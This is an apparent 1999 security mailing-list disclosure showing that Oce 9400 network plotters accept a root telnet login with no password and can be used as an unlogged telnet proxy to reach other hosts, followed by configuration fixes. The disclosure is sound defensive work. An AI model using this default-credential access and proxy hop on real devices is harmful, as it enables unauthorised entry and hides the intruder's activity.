OCE' 9400 plotters

From: Larry W. Cashdollar (lwcashdat_private)
Date: Thu Aug 19 1999 - 11:03:32 PDT

    Aleph1,
            I apologize if this has be brought up before, but with the recent
    post concerning the QMS 2060 printers and the length of time I have sat on this
    (4 months) I figured it should be released.  I sent this information to OCE long
    ago with  no response.  I am aware of the Intelligent Peripherals bulletin by
    CIAC.

            http://www.ciac.org/ciac/bulletins/j-019.shtml

            I have a few plotters / printers under my audit umbrella and
    noticed something interesting on an Oce' 9400 plotter.  The printer has the
    ability to be a telnet proxy.  Where as a user can hop via telnet to other
    hosts.  If the printer is not setup properly the connections will go unlogged.

    bunyip% telnet JPP1
    Trying 192.168.38.244...
    Connected to JPP1.
    Escape character is '^]'.

    Network Printer Server Version 5.6.3 (192.168.38.244)

    login: root
    Password:[Just enter here]

    Welcome root user

    WARNING: current and stored values differ.
    Use 'list diff' command to find the differences.
    Current values will be lost if unit is reset.

    192.168.38.244:root> telnet 192.168.38.110
    trying 192.168.38.110 ...
    Connected to 192.168.38.110
    Escape character is '0x18'

    Red Hat Linux release 5.9 (Starbuck)
    Kernel 2.2.3-5 on an i586
    login:

    192.168.38.244:root> list sysinfo
                 name:
              contact:
             location:
              version: 5.6.3
        serial number: 13029
             compiled: Mar 25 1998    loginfo: sys
              logport:
               syslog: 255.255.255.255
                email: NetPrint@<unconfigured>
           dns server: 192.168.38.110
               module: novell, appletalk, netbios
             checksum: 1E54

             All that is needed is a valid DNS server setup in the plotter
    configuration.

    192.168.38.244:root> set sysinfo dns 192.168.38.100

    And anyone can use the plotter as an anonymous telnet proxy.

    Fix:

    Enable passwords for the accounts on the plotter:

    syntax: set user add <NAME>
             set user del <NAME>
             set user passwd <NAME> [<PASSWORD>]
             set user type <NAME> root|guest
             set user from default|stored

    Enable logging:

    syntax: set logpath <LOGPATH> name <NEW_NAME>
             set logpath <LOGPATH> type [[-]job] [[-]user] [[-]pgcnt] [[-]cksum]
                         [[-]printer] [[-]ioport]
             set logpath <LOGPATH> port <TCP-PORT>|email|syslog
             set logpath from default|stored

    P.S. This plotter has ping functionality also. No, I have not tried DoS attacks
    =)

    syntax: ping [-s] <IPNAME> [<DATASZ> [<NUMPKTS>]]

    -- Larry W. Cashdollar
       Unix Administrator
       Security Operations